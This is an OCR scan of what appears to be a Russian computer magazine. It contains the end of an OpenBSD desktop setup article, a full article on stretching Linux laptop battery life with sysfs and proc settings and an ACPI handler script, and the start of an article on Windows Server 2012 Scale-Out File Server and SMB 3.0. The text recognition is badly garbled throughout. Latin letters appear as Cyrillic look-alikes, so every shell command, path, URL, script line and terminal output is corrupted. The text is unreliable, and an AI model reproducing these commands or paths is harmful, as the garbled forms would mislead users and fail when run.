Адреса 0145-серверов прописываются точно так же, как в дру- 
гих никсах, в файл /еІс/гезоІѵ.сопЕ Например: 

патезегѵег 8. 8. 8. 8 
патезегѵег 8. 8. 4. 4 

Всего этого достаточно, чтобы при следующей загрузке сеть 
была полностью работоспособной, хотя изменения можно приме- 
нить сразу, выполнив скрипт пеізіагі: 

$ зисіо 5б /е1:с/пе1:5І:аг1: 

С беспроводными сетями все не намного сложнее. Поддержка 
механизма ѴѴРА, который сегодня используют по умолчанию почти 



$ зисіо зіі /е-бс/пе-Ез-Еагб гаІѲ 

И это все. Действительно все. Если же необходимо получить 
список доступных сетей, то это легко сделать с помощью следую- 
щей команды: 

$ і-Рсопб§ -М га10 

При желании можно подготовить сразу несколько версий файла 
ЬозІпате.гаІО и копировать их на место оригинала с помощью 
скрипта, который определяет наличие нужной сети, используя 
команду выше, и перезагружает сетевые настройки. 



ЧТО ДАЛЬШЕ? 



Мы установили, настроили и полностью «десктопизировали» 
ОрепВЗО за каких-то полчаса. Это действительно быстро и не так 
сложно, как могло бы показаться. Более того, многие этапы уста- 
новки и настройки в ОрепВЗО удалось выполнить намного быстрее 
и проще, чем в других ОС. Обрати внимание, что мы получили пол- 
ностью рабочий десктоп, не исправив ни одной строчки в головных 
конфигах системы. Многие действия, которые в других системах 
потребовали бы изучения синтаксиса очередного конфига и его 
правки, в опенке можно выполнить с помощью одной команды 
и очень легко заскриптовать. Когда ты начнешь использовать 
ОрепВЗБ ежедневно, ты поразишься, как просто в ней сделать, 
казалось бы, сложные вещи. ЗЕ 



СПИСОК ИНСТАЛЛЯЦИОННЫХ 
СЕТОВ 



Ь5СІ — ядро системы (обязателен для установки) 
ЬвсІ.тр — ядро для многопроцессорных систем 
Ьбсі.гсі — ядро с поддержкой ПАМ-диска (для 
восстановления системы) 

Ьазебі Лдг — содержит базовые компоненты 

(обязателен для установки) 

еісбі Лдг — содержит файлы каталога /еіс 

(обязателен для установки) 

сотрбІЛдг — компилятор, заголовочные файлы 

и библиотеки 

тапбІЛдг — справочные страницы 

датебі Лдг — набор простеньких текстовых игрушек 

хЬазебІЛдг — библиотеки и утилиты для XII 

хеІсбІЛдг — конфиги XII 

хГопІбІ Лдг — набор шрифтов XII 

хзегѵбі Лдг — Х-сервер 

хзИагебІЛдг — справочные страницы, настройки 
локали, заголовочные файлы и прочее для X ѴѴіпсіоѵѵ 



МѴІ 1 . 1 ! 

• Официальный 
РАО: 

орепЬзсІ.огд/Гад: 

• руководство 
по фильтру 
пакетов РР: 

орепЬасІ.огд/Гад/рГ: 

• онлайновые 
справочные 
страницы: 

орепЬвсІ.огд/сді- 

Ьіп/тап.сді: 

• инструкция 
по обновлению 
системы: 

орепЬзсІ.огдЛад/ 

ирдгагіеБІ.ЫтІ: 

• статьи, 
руководства, 
пошаговые 
инструкции: 

орепЬзсІ.ги/гіосз . 
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ІЖІХОІО 



Максим Полевой (такз.НаІсНеІйуапсіех.ги) 



ПИНГВИН 




дальнего полета 



ЭКСТРЕМАЛЬНЫЕ МЕТОДЫ ПРОДЛЕНИЯ 
ЖИЗНИ НОУТБУКА ОТ БАТАРЕИ 



При стандартных настройках І_іпих ноутбук способен 
проработать от аккумуляторной батареи всего несколько 
часов. И дело тут даже не в оптимальности настроек, а в 
желании разработчиков дистрибутива сохранить максимум 
функциональности ОС, хотя такие вещи, как встроенная 
веб-камера или ВІиеСооСЬ, нужны далеко не всегда 
и далеко не всем. В этой статье я расскажу, как урезать 
функциональность машины до такой степени, чтобы продлить 
время ее работы настолько, насколько это возможно. 




ВВЕДЕНИЕ 



Современные ноутбуки оснащены большим количеством различных 
компонентов, включая дополнительную высокопроизводительную 
видеокарту, звуковой адаптер, веб-камеру, ВІиеІооіЬ и ѴѴі-Рі- 
адаптеры, множество ІІЗВ-портов и других составляющих. Все они, 
даже при использовании так называемого энергосберегающего 
режима, переводящего процессор, жесткий диск и дисплей в режим 
минимального потребления энергии, продолжают исправно рабо- 
тать, а значит, так или иначе сажают батарею. 

Задача любого, кто хочет получить по-настоящему «долго- 
играющий» ноутбук, — отключить как можно больше компонентов 
системы, сохранив максимальное количество энергии, а также, по 
возможности, оптимизировать режим энергосбережения, выставив 
более агрессивные настройки сохранения энергии для процессора, 
жесткого диска и других жизненно важных компонентов машины. 
Всем этим мы сейчас и займемся. 



СЕРДЦЕ МАШИНЫ 



Первое, что мы должны сделать, — это, так сказать, отделить 
зерна от плевел, то есть разобраться, какие компоненты мы можем 
отключить вовсе, для каких сможем применить энергосберегаю- 
щие режимы, а какие должны оставить работать в полную силу. 
Для этого разделим все составляющие машины на особо важные 
и второстепенные. 

К особо важным относятся, как нетрудно догадаться, процессор, 
жесткий диск, видеоадаптер, дисплей и клавиатура. Без них исполь- 
зовать ноутбук просто бессмысленно, поэтому отключить их не полу- 
чится, а вот перевести в менее агрессивный в плане энергии режим 
вполне возможно. Первое, с чего мы начнем, — это процессор. Любой 



хоть сколько-нибудь современный проц имеет поддержку энергос- 
берегающего режима, для управления которым можно использовать 
файловую систему зузіъ. Например, следующая команда выведет на 
экран список поддерживаемых регуляторов производительности: 

$ саі: /5у5/сІеѵісе5/5у5І:ет/сри/сри0/сри-Рпея/ \ 
5са1іп§_аѵаі1аЫе_§оѵегпог 
опсіетапсі рег-Рогтапсе 

Как видно, в моей системе их по умолчанию два, опсіетапсі — 
стандартный способ регулировки производительности, при котором 
частота процессора будет резко подпрыгивать в моменты повышен- 
ной нагрузки и медленно опускаться при снижении нагрузки. С точки 
зрения отзывчивости системы и комфорта пользователя это лучший 
выбор в любой ситуации, поэтому по умолчанию при работе от 
батарей используется именно эта политика. Однако помимо модуля 
сриітер_роѵѵег5аѵе и постоянно держащий процессор на самой низ- 
кой частоте. На общей производительности системы он сказывается 
не так уж и сильно, зато батарею позволяет сэкономить существенно. 
Чтобы его активировать, достаточно выполнить две команды: 

# тосІргоЬе сри-Ргедроіл/егБаѵе 

# -Рог і іп /5У5/сІеѵісе5/5у5І:еі , п/сри/*/сри-Рпед/ \ 

зсаііп^ ^оѵегпог ; \ 

сіо есбо роыегзаѵе > $п^ сіопе 

Здесь мы использовали цикл, чтобы изменить регулятор сразу 
на всех ядрах процессора. Теперь попробуем перевести жесткий 
диск в режим пониженного потребления энергии. Делается это в 
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первую очередь с помощью включения функции энергосбережения 
5АТА-устройств, уменьшения времени активности диска и увеличе- 
ния тайм-аута на сброс «грязных» буферов на диск. Первое действие 
можно выполнить с помощью все той же зузі'з. Достаточно просто за- 
писать значение тіп_роѵѵег в управляющий файл всех 5АТА-портов. 
Обычно их четыре или даже шесть, поэтому снова пишем цикл: 

# ТОГ І І П / ЗУБ/ СІЭ55/ 5С5І МОБІі/*/ \ 

Ппк рошег тапа^етепі: роіісѵ ; \ 
сіо есііо тіп ромег > $і; сіопе 

Снизить время активности диска можно, включив так называе- 
мый режим ноутбука (І_арІор Мобе): 

# есііо 5 > /ргос/БУБ/ѵт/ІарІіор тосіе 

Режим ноутбука перенастраивает подсистему управления 
памятью и файловыми системами таким образом, чтобы отсрочить 
сброс данных или чтение с диска на как можно больший период. В 
частности, в результате его включения задержка сброса измененных 
страниц памяти на диск будет увеличена с 30 секунд до 10 минут, а ме- 
ханизм предварительного чтения с диска будет захватывать больше 
данных за раз. Также будет применено несколько других твиков. Что- 
бы еще больше разгрузить диск, добавим несколько других настроек: 

# есііо 90 >^ргос/5уз/ѵт/біг1:у_га1:іо 

# есііо 1 > /ргос/БѴБ/ѵт/сІігІіу Ьаск^гоипсІ гаііо 

# есііо 6ѲѲѲѲ > /ргос/5У5/ѵт/біг1:у_ыгі1:еЬаск_сеп1:І5ес5 

Первая команда здесь устанавливает максимальный размер 
памяти для хранения «грязных» данных процессов, прежде чем 
процесс будет вынужден сбросить их на диск. Вторая — минималь- 
ное количество памяти для хранения «грязных» данных. Значения 
обоих параметров указываются в процентах и задают своего рода 
окно для хранения «грязных» данных. Соответственно, чем шире 
будет это окно, тем реже ОС станет будить диск для записи. Третья 
команда устанавливает задержку между проверками на наличие 
«грязных» данных, равную 600 секундам (60 000 сантисекунд). 

Еще один очень важный момент — это отключение принуди- 
тельной записи журнальных файлов на диск. По умолчанию зузіод 
делает зупс при каждой записи в журнал, чтобы не потерять данные 
в случае сбоя системы, но это поведение можно отключить, если 
указать знак минуса перед именем журнального файла в /еіс/зузіод. 
сопТ Например: 

аиііі . *; аиіііргіѵ . * -/ѵаг/іо^/а иіііі . 1о§ 

Теперь видеоадаптер. С ним особых хитростей нет, энергосбе- 
режение работает само по себе на уровне железа. Но если ноутбук 
оснащен двумя адаптерами одновременно: низкопроизводительным 
Іпіеі, встроенным в материнку, и дискретным полноценным адапте- 
ром, — начинаются проблемы. І_іпих поддерживает такие конфигу- 
рации, начиная с ядра версии 2.6.34, однако многие дистрибутивы 
просто не используют возможность обесточить производительную 



ЗАДАЧА — ОТКЛЮЧИТЬ 
КАК МОЖНО БОЛЬШЕ 
КОМПОНЕНТОВ СИСТЕМЫ, 
СОХРАНИВ МАКСИМАЛЬНОЕ 
КОЛИЧЕСТВО ЭНЕРГИИ 



видеокарту при отключении питания от ноутбука. Тем не менее 
решить эту проблему можно с помощью одной простой команды: 

# есііо ОРР > /5У5/кегпе1/сІеЬи§/ѵ§а5ыі1:сІіегоо/5ыі1:сІі 

Она отключит не используемый в данный момент адаптер, а так 
как все ноутбуки по умолчанию выводят изображение через встро- 
енную видеокарту, обесточенной окажется дискретная видяха. Еще 
одной хорошей идеей будет перевести шину РСІ-Е в режим низкого 
потребления энергии: 

# есііо роыегзаѵе > /5у5/тосІи1е/рсіе_а5рт/рапате1:ег5/ро1ісу 

Проблема с яркостью дисплея решается еще проще. Можно 
снизить яркость до нужного уровня либо с помощью клавиш управ- 
ления ноутбука (они обычно исправно работают), либо путем записи 
в один из файлов зузі'з. Для этого сначала выясняем максимальную 
яркость дисплея: 

$ саТ /5у5/с1а55/Ьаск1і^Іі1:/*/тах_Ьгі§ІтІ:пе55 
15 

Азатем записываем в файл ЬпдЫпезз того же каталога значе- 
ние между 0 и полученным максимумом. Например: 

# есііо 4 > /5у5/с1аББ/Ьаск1і§Іі1:/*/Ьгі§ІтІ;пе55 

На этом разборки с жизненно важными компонентами машины 
можно считать завершенными. 



ОТСЕКАЕМ ЛИШНЕЕ 



Кроме основных компонентов системы, ноутбук обычно оснащен 
адаптером Еіііегпеі, модулями ѴѴі-Рі и ВІиеІооіЬ, несколькими 
ІІ5В-портами, Сй-приводом, веб-камерой и, конечно же, звуковой 
картой. Все это можно по возможности либо отключить вообще, 
либо настроить на агрессивное сохранение энергии. 

Первые на очереди ѴѴі-Рі, ЕіЬегпеІ и ВІиеІооіЬ-адаптеры. Начнем с 
ѴѴі-Рі. Его можно либо вообще выключить, например, если ты собира- 
ешься в дорогу, где по пути нет беспроводной связи, либо перевести 
в режим сбережения энергии, при котором адаптер будет на время 
засыпать, просыпаясь для отправки и получения накопившихся паке- 
тов. Первая операция осуществляется с помощью такой команды: 

# -Рог і іп 'бпсі /зуз -пате г-Р_кі11' ; \ 

сіо есііо 1 > $і ; сіопе 

Вторая — такой: 

# імсопб§ еіІіѲ роыеп оп 

Имей в виду, что режим энергосбережения требует поддержки 
со стороны точки доступа, она должна уметь накапливать пришед- 
шие пакеты и удерживать их до очередного пробуждения адаптера. 
Так что если предполагается работа в сети допотопных беспровод- 
ных роутеров, лучше его даже не активировать. С Еіііегпеі никаких 
проблем быть не должно, при отсутствии несущей адаптер нахо- 
дится в состоянии простоя, фактически не потребляя энергии, а вот 
ВІиеІооіЬ будет расходовать ресурсы батареи, постоянно ожидая 
появления в сети нового устройства. Отключить его можно так: 



# Ііс іс опб§ І1 С І0 сіош п 

# гттосі Іісі_и5Ь 



Также мы можем отключить питание на ІІ5В-портах. Совсем 
отключать, разумеется, бессмысленно, поэтому просто активируем 
режим энергосбережения, который будет обесточивать порты в 
случае, если в них ничего не воткнуто: 
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ІЖІХОІО 




Редактируем /еіс/асрі/ИапсІІег.гИ 



# -Рог і іп /5У5/Ьи5/и5Ь/сІеѵісе5/*/роыег/аи1:о5и5репсІ : \ 

сіо есЬо 1 > $і; сіопе 

# -Рог і іп /зу5/Ьи5/и5Ь/сІеѵісе5/*/роыег/1еѵе1; 

сіо есііо аи1:о_>і$1; сіопе 

Первая команда запускает автоотключение портов, вторая за- 
действует автоматическую регулировку подачи энергии. Что каса- 
ется Сй-РОМ, то сам по себе он энергию не потребляет, по крайней 
мере пока в нем нет диска, а вот на то, чтобы определить, есть ли 
диск, уходят процессорные ресурсы, а значит, и часть батареи. 

К счастью, эту функцию можно отключить с помощью исПакз (замена 
устаревшему НАІ_ для дисковых накопителей): 

# исіізкз - - іпКііЬіі: - роіііп^ /сІеѵ/БГ0 

Правда, после этого диски придется монтировать вручную. 
Камера в дороге не особенно нужна, поэтому ее также можно деак- 
тивировать (экономия получится совсем небольшой, но мы же хотим 
выжать из батареи действительно все): 

# тосІргоЬе -г иѵсѵісіео 

Звук также можно отключить, но это не имеет смысла, 
так как современные Нй-кодеки ІпіеІ (установлены почти везде) 
умеют самоотключаться во время простоя, эффективно экономя 
энергию. По умолчанию этот режим также почему-то не активиро- 
ван (возможно, из-за треска звука при переключении между режи- 
мами), но его можно легко активировать с помощью зузі'з: 

# есііо У >^/5уз/тосІи1е/5псІ_ІісІа_іп1:е1/рагате1:ег5/ 

рошегзаѵе сопігоі іе г 

# есііо 1 > /5У5/тосІи1е/5псІ_ІісІа_іп1=е1/рагате1=ег5/роыег_5аѵе 

Первая команда включаетуправление энергосбережением, 
вторая — активирует его. 



АВТОМАТИЧЕСКАЯ АКТИВАЦИЯ 
ОПЦИЙ ЭНЕРГОСБЕРЕЖЕНИЯ Д 



Все эти команды не обязательно вводить вручную, так как ин- 
струменты работы с АСРІ в І_іпих позволяют определить список 
действий, которые будут выполнены во время отключения ноутбука 



ПРИВЕДЕННЫЕ НАСТРОЙКИ 
ПОЗВОЛЯЮТ ПРОДЛИТЬ 
ВРЕМЯ РАБОТЫ ОТ БАТАРЕИ В 
ПОЛТОРА-ДВА РАЗА 



[ @туГі05І “]$ ^исіо ішсапГід шіапй рсжег оп 
Пароль : 

[ ЙтуГта* ііьСопГід 

еСГів по иігеіез^ ехіепьюпа. 

Іо по иігеіезо ехСепаюпа. 

ІЕЕЕ ѲЭ2.11Ьдп Е55І0 : " 1Э1Э" 

Мойе іііапэдед Ргечиепсу -2 .437 ОН? Пссез&РоігЦ: іс :ЯГ:Г7 \4Ь \ 39 :Ѳ8 
Віі Ра1е=БЗ МЬ/з Тх-Роіи&г=13 ОВш 

Іопд ] ітіі :7 ЙТЗ Лпг :оГТ Ггадтелі Лпг :оГТ 

ШЗШШШШІ 

Ьіпіі СЫа] іІі_рБ4/7В 5 ідпа ] 1еѵе]=-4б МВт 

І?х іпѵаіій пшій:0 Рх іпѵаіій сгурІ.В Ех іп^аПй Ггад.В 

Тх ехсеа^іѵе ге1гіе5:33 ІпѵаПй тІ5с:37ВЗ Ьеасап:В 

[ УтуГтз* 



Включаем энергосберегающий режим ѴѴі-Рі-адаптера 

от розетки или повторного подключения к электросети. Действия 
в виде обычных Ыпих-команд прописываются в файл /еіс/асрі/ 
ІіапсІІег.зІі. В разных дистрибутивах его содержимое может сильно 
отличаться, поэтому вместо рассказа о том, как его редактировать, 
я просто приведу универсальную версию файла, которая подойдет 
почти к любому дистрибутиву. 

Итак, файл ЬапсІІег.зЬ представляет собой обычный скрипт, 
который автоматически запускается ядром І_іпих в моменты, когда 
состояние питания ноутбука/ПК изменяется. Это могут быть такие 
случаи, как нажатие кнопки питания, отключение кабеля питания, 
закрытие крышки и даже нажатие кнопок управления громкостью. 
Чтобы скрипт понимал, в каком из этих случаев его вызывают, ему 
передается параметр, описывающий событие, например ЬіШоп/ 
роѵѵег, ЬіШоп/зІеер, ас асіа ріег и так далее. Задача скрипта: выпол- 
нить определенный набор команд в каждом из приведенных случа- 
ев, либо просто пропустить событие (например, нет особого смысла 
обрабатывать нажатие клавиши питания, так как ядро и стартовые 
скрипты выполнят всю необходимую работу). Моя версия скрипта: 

# ѵі /е1с/асрі/ИапсІ1ег.5Іі 

#! /Ьіп/біі 



# Определяем тип события 

сазе "$1" іп 

# Нажата клавиша уменьшения громкости 
Ьиііоп/ѵоіитесіомп) 

/изг/Ьіп/атіхег зеі: РСМ 5%- 



# Нажата клавиша увеличения громкости 
Ьиііоп/ѵоіитеир) 

/и5г/Ьіп/атіхег зеі: РСМ 5%+ 

# Есть/нет питания от сети 

ас_асІар1:ег) 

саБе "$2" іп 
АСѲ) 

саБе "$4" іп 

# Питания от сет и нет 
00000000) 

# командыі 



# Питание от сети есть 
ѲѲѲѲѲѲѲ1) 

# команды2 

і і 

еБас 

еБас 



# Закрыта крышка - отправляем ноутбук в сон 

Ьиііоп/ІісІ) 

§гер -д сІОБесІ /ргос/асрі/Ьиііоп/1ісІ/*/5І:а1:е 
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Список наиболее жадных до энергии процессов в РоѵѵегТОР 



Статистика использования оборудования в РоѵѵегТОР 



і-р [ $? = 0 ]; ібеп 

есііо -п тет >/5у5/роѵѵег/5І:а1:е 
б 



езас 

Скрипт обрабатывает всего три события: управление гром- 
костью, наличие питания от сети и закрытие крышки ноутбука. 

Нам этого будет вполне достаточно. Я намеренно не стал вставлять 
команды, выполняемые при подключении/отключении кабеля 
питания, прямо в скрипт. Чтобы удобнее было читать, я приведу 
их ниже. Итак, «командыі » — питания от сети нет, ноутбук работает 
от батареи, включаем максимальное энергосбережение: 

# Процессор 

/зЬіп/тосІргоЬе сри-Ргер_роѵѵег5аѵе 

•Рог і іп /5У5/сІеѵісе5/5у5І=ет/сри/*/сри-Рпед/ 
5са1іп§_§оѵегпог; 
сіо есііо роѵѵегзаѵе > $і; сіопе 

# Подсистема управления памятью 

есііо 5 > /ргос/5у5/ѵт/1ар1:ор_тосІе 

есііо 90 > /ргос/5у5/ѵт/сІіг1:у__га1:іо 

есііо 1 > /ргос/5уз/ѵт/сІіг1:у_Ьаск§гоипсІ_га1:іо 

есііо 6ѲѲѲѲ > /ргос/5У5/ѵт/сІіп1=ѵ ѵѵгіІіеЬаск сеп1=І5ес5 

# Жесткие диски 

-Рог І ІП /5Ѵ5/с1а55/5С5І_І105І:/*/ \ 

1іпк_роѵѵег_тапа§етеп1:_ро1ісу; 
сіо есііо тіп_роѵѵег > $і^сІопе 

# Аудио 

есііо У > /5Ѵ5/тосІи1е/5псІ Іісіа Іп1=е1/рагате1=ег5/ \ 

рошегзаѵе сопіігоііег 

есііо 1 > /5У5/тосІи1е/5псІ_ІісІа_іп1:е1/рагате1:ег5/роѵѵег_5аѵе 

# Ц$В 

-Рог і іп /зуз/Ьиз/изЬ/сІеѵісеБ^/ромег/аиіозизрепсП \ 

сіо есііо 1 > $і; сіопе 

-Рог і іп /5У5/Ьи5/и5Ь/сІеѵісе5/*/роыег/1еѵе1; \ 
сіо есііо аиіо > $і; сіопе 

/изг/Ьіп/исІІБкБ --іпІііЬіІі-роІІіп^ /сІеѵ/згѲ 

# Веб-камера 

/зЬіп/тосІргоЬе -г иѵсѵісіео 

# Віиеііооіііі 

/изг/зЬіп/Іісісрпб^ Іі сіѲ сіоѵѵп 

/зЬі п/гттос! Іісі изЬ 

# іліі-Рі 

/изп/5Ьіп/іысопРі§ еі1і0 роыеп оп 

# Экран 

есііо 2 > /5у5/с1а55/Ьаск1і§ІгІ:/*/Ьпі§Іі1:пе55 

#_ Видео адаптер 

есііо ОРР > /5У5/кегпе1/сІеЬи^/ѵ^а5ѵѵі1:сІіегоо/5ѵѵі1:сІі 

есііо роѵѵегзаѵе > /5Ѵ5/тосІи1е/рсіе_а5рт/рагате1:ег5/ро1ісу 



Теперь «команды2» — питание от сети есть, энергосбережение 
можно отключить: 

# Процессор 

-Рог і іп /5У5/сІеѵісе5/5у5І=ет/сри/*/сри-Ргед/ \ 

Бсаііпа еоѵегпог ; \ 

сіо есііо опсіетапсі > $і: сіопе 

# Подсистема управления памятью 

есііо 0 >^/ргос/5у5/ѵт/1ар1:ор_тосІе 

есііо 10 > /ргос/5уз/ѵт/сІігіу_га1:іо 

есііо 5 > /ргос/5у5/ѵт/сІіг1:ѵ Ьаск^гоипсІ гаіііо 

есііо 6000 > /ргос/БУБ/ѵт/сІігІіѵ ѵѵгііеЬаск сепіізесБ 

# Жесткие диски 

-Рог І ІП /5у5/СІа55/5С5І_І105І:/*/ \ 

1іпк_роѵѵег_тапа§етеп1:_ро1ісу; 
сіо есііо тах_рег-Рогтапсе > $і^ сіопе 



Как видно, списки команд очень похожи, и второй набор про- 
сто приводит систему к первоначальному состоянию. На диске 
ты найдешь полную версию скрипта, который следует слегка 
отредактировать, чтобы подогнать под твой ноутбук, — например 
убрать строки, касающиеся ВІиеіооіИ, если такого адаптера в ноуте 
нет, или убрать строку, отключающую камеру в том случае, если она 
нужна в дороге. Теперь сохрани файл, поставь на него бит испол- 
нения и попробуй выдернуть кабель питания — настройки должны 
вступить в силу незамедлительно. 



ЗАКЛЮЧЕНИЕ 



Приведенные настройки позволяют продлить жизнь ноутбука 
от батареи в полтора-два раза в зависимости отусловий исполь- 
зования. Применить их к своей системе легко, просто скопируй 
файл с нашего диска и положи его в /еіс/асрі/. При этом настрой- 
ки можно без труда подогнать под свою систему и оставить рабо- 
тать только те компоненты, которые нужны именно тебе. Ни один 
дистрибутив не позволяет сделать это с помощью стандартных 
инструментов. ПС 



ИСЧЕРПАНИЕ РЕСУРСОВ НОР 



Жесткие диски для настольных систем выдерживают 
всего 40 000-50 000 остановок/запусков, так что при 
засыпании жесткого диска каждые 10 минут он умретза 
277 дней. Диски ноутбуков выдерживают 300 000 оста- 
новок/запусков, поэтому в том же варианте использова- 
ния они выдержат 2083 дня, или 6 лет. 



ІШП 

Для поиска прожор- 
ливых приложений 
и компонентов 
ядра ты можешь 
использовать 
утилиту роѵѵегіор. 

С ее помощью также 
можно активировать 
многие из приведен- 
ных в статье опций 
энергосбережения. 
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Сегодня в связи со стремительным ростом 
объемов информации, массовым внедрением 
облачных технологий и решений виртуализации 
даже к относительно бюджетным системам 
хранения данных предъявляются качественно 
новые требования. Расширения роли файловой 
службы, доступные в ѴѴіпсіоѵѵз Зегѵег 2012, 
позволяют обычным серверам выступать 
на равных с сетями хранения 5АІМ, обеспечивая 
необходимый уровень гибкости, доступности 
и скорости обмена данными. 



НОВЫЙ ТИП 5САІ_Е-01)Т РІІ_Е 5ЕРѴЕР 



Долгое время главной задачей файлового сервера под управле- 
нием ѴѴіпсіоѵѵз было хранение обычных пользовательских файлов, 
вероятно поэтому возможности протокола 5МВ не расширялись. 
Изначально 5МВ-сессия спроектирована с расчетом на то, что 
после того, как клиент загрузил с удаленного ресурса требуемый 
документ или изображение, соединение практически сразу закры- 
вается. Для приложений, которые постоянно и активно работают 
с данными на диске и продолжительное время держат файлы 
открытыми, такой принцип неприемлем, поэтому в дополнение 
к файловым серверам приходилось развертывать сети хранения 
5АІ\І (Зіогаде Агеа ІЧеІѵѵогкз). В ѴѴіп2012 роль файлового сервера 
получило новое кластерное расширение, позволяющее хранить 
данные серверных приложений, таких как 50І_ Зегѵег и Нурег-Ѵ, 
а также образы ѴМ на общих файловых ресурсах, предоставляя 
тотже уровень доступности, надежности и производительности, 
который ранее гарантировали только 5АІ\І. Подобный кластер 



можно построить при помощи двух, трех или четырех серверов, 
каждый из которых расшаривает аналогичный ресурс и принимает 
подключения клиентов. Один из узлов является лидером и управ- 
ляет работой «клонов», отслеживая их состояние. Если один из 
серверов выходит из строя, все подключенные к нему клиенты 
прозрачно перенаправляются на другой узел кластера, без раз- 
рыва текущих соединений. Новый тип файлового сервера получил 
название 5саІе-0иІ Рііе Зегѵег (50Р5), а файловые ресурсы, задей- 
ствованные в этой роли, стали именоваться 5саІе-0иІ Рііе ЗЬагез. 

В основе 50 Р5 лежит целый ряд новинок, анонсированных 
в ѴѴіп2012: технология Сіизіег ЗЬагесІ Ѵоіитез ѵ2 (С5Ѵѵ2), протокол 
5МВ 3.0 и ресурсы ОізІгіЬиІесі ІЧеІѵѵогк ІЧате (распределенное 
сетевое имя, ОМЫ). Разберем их подробнее. 

В обычном кластере для подключения клиента используется 
САР (СІіепІ Асеева Роіпі], который настраивается при создании 
кластера и состоит из ІЧЕТВІ05 имени кластера и ІР-адреса. Чтобы 
клиентам было проще работать, САР регистрирует имя кластера 
в службах 0145 и ѴѴІ N5. В ѴѴіп2к8/Р2 по умолчанию доступна лишь 
одна запись САР и клиенты могут подключаться по имени только 
к одному из узлов кластера. Другие ноды в этот момент простаи- 
вают, «ожидая», когда выйдет из строя основной сервер. Такой 
подход нельзя назвать эффективным, и для решения проблемы 
доступности других узлов разработчики ОС предложили исполь- 
зовать механизм распределенных сетевых имен. Для этого в йІЧЗ 
регистрируется ІР (статический или динамический) каждого узла 
кластера, а 5МВ-клиенты при обращении к йІЧЗ получают список 
из шести связанных с кластером ІР-адресов, после чего пытаются 
подключиться к ресурсам «по кругу». В итоге в работе участвуют 
все узлы кластера. 

Технология Сіизіег ЗЬагесІ Ѵоіитез, появившаяся в ѴѴіп2к8, 
была разработана специально для совместного использования 
с Нурег-Ѵ. Она позволяет нескольким узлам кластера одновремен- 
но обращаться к файловой системе ІЧТР5 без каких-либо ограни- 
чений, размещать на общем кластерном диске ѴМ, запускаемую 
на разных узлах кластера, и легко переносить ее между сервера- 
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Выбор роли для настройки высокой доступности 

ми. Как прослойка при обращении к ІМТР5 используется С5Ѵ Рііе 
Бузіет (С5ѴР5), которая обеспечивает решение всех сопутствую- 
щих проблем. Например, изменение метаданных ІМТР5 выпол- 
няеттолько один узел-владелец, остальные производят только 
операции ввода-вывода. 

В ѴѴіп2012 анонсирована вторая версия С5Ѵ и количество ролей, 
к которым можно применить С5Ѵѵ2, возросло, в частности доба- 
вилась служба Рііе Бегѵегз. Теперь поддерживаются все функции 
ІМТР5 (за исключением транзакций), улучшена производитель- 
ность при копировании файлов, уменьшены простои при работе 
СНК05К — так, во время восстановления файловой системы С5Ѵ 
сохраняет доступность ресурса. Из других функциональных осо- 
бенностей С5Ѵѵ2 стоит отметить: 

• использование механизма оріоскз (оррогіипізііс Іоскз) для син- 
хронизации данныхи метаданныхдоступа кфайлам, локального 
кеширования иобеспечения целостностиданныхвслучае, когда 
доступ кфайлуосуществляется несколькимиэкземплярами С5ѴР5; 

• возможность шифрования тома СБѴпри помощи ВШ_оскег, что 
обеспечивает дополнительнуюзащитуданных. При расшифровке 
используется СІ\І0 (СІиБІегІЧате 0Ь)есі) компьютера кластера, 
убраны внешние зависимости при аутентификации, что ускоряет 
процесс; 

• упрощено резервное копирование средствами ѴѴіп2к8 или 
ѴѴіп2012, добавлена поддержка Ѵ55 (ѴоІитеБЬасІоѵѵСоруВегѵісе); 

• снимки можноделатьудаленнобез перемещениятомов между 
кластерами; 

• интеграция с 5М В МиШсЬаппеІ иБМВ йігесі позволяет за дей- 
ствовать для СБѴ-трафика одновременно несколько сетевых 
адаптеров и использовать РОМА-совместимые сетевые адаптеры 
(подробнеео нихв разделе«5МВ ОігесЫ. 



НОВЫЕ ФУНКЦИИ 5МВ 3.0 



Для обеспечения всех возможностей 50Р5 разработчики осна- 
стили протокол 5МВ 3.0 тремя новыми функциями: Тгапзрагепі 
Раііоѵег, Оігесі и МиШсЬаппеІ. Рассмотрим каждую из них отдельно. 

5МВ ТКАМ5РАКЕМТ РАІЮѴЕК 

5МВ Тгапзрагепі Раііоѵег обеспечивает высокую доступность 
узлов за счеттого, что быстро переключает клиента на другой 
сервер, не прерывая работу приложения. Чтобы задейство- 
вать эту возможность, в настройках сетевых папок при работе 
мастера «ІЧеѵѵ БЬаге ѴѴігагсІ» на этапе «ОіЬег БеШпдз» следует 
установить параметр «ЕпаЫе Сопііпиоизіу АѵаіІаЬіІіІу», наличие 
которого проверяют клиенты при подключении. При создании 
шары с помощью РоѵѵегБЬеІ I нужный параметр задается автома- 
тически. Проверить легко: 




Установка типа файлового сервера 

Р5> ІМем-БглЬБІіаге -Мате 51:ога§е — РаііИ е:\з1:ога§е \ 
-Бсоре зтЬ-Рз -РиІІСопІігоІ ехатрІеХасІтіпізІігаІіог 
Р5> Се1:-5тЬ5Ііаге -Мате 51:ога§е | Беіесі: * 



СопІііпиоизІуАѵаіІаЫе : Тгие 



При переключении к другому узлу клиент, обеспечивающий со- 
гласованность пространства имен с помощью Резите Кеу, должен 
завершить начатую ранее операцию. Для этого он обращается 
к фильтру Резите Кеу и восстанавливает дескриптор в состоя- 
ние, предшествующее сбою. При выходе из строя одного из узлов 
кластера клиент автоматически переподключается к другому 
узлу, возобновляя работу. Для приложения весь процесс выглядит 
абсолютно прозрачно, без каких-либо сбоев или ошибок, только 
на время уменьшается число 1/0-операций, и здесь становится 
важным свести к минимуму этот интервал. При определении до- 
ступности узла протокол 5МВ использует ТСР/ІР, в своей работе 
полагающийся на тайм-аут, значение которого может достигать 
20 секунд. В итоге на выявление сбоя может быть потрачено зна- 
чительное время, ощутимое для операций ввода-вывода. Чтобы 
не ожидать окончания тайм-аута и избежать возможных задержек, 
была создана новая служба 5МВ Шпезз, устанавливаемая авто- 
матически с компонентом отказоустойчивой кластеризации. При 
первом подключении 5МВ-клиента кузлу кластера он уведомляет 
об этом клиент БМВ Шпезз, работающий на этом же компьюте- 
ре, и в ответ получает список узлов кластера. Далее клиент БМВ 
ѴѴіІпезз выбирает другой узел кластера, службе БМВ ѴѴіІпезз 
которого отправляет запрос на регистрацию. Теперь в случае сбоя 
на первом сервере служба БМВ ѴѴіІпезз второго узла разошлет 
всем участникам сообщение, получив которое клиент автоматиче- 
ски инициирует переподключение к этому узлу кластера. Про- 
смотреть состояние БМВ Шпезз можно при помощи командлета 
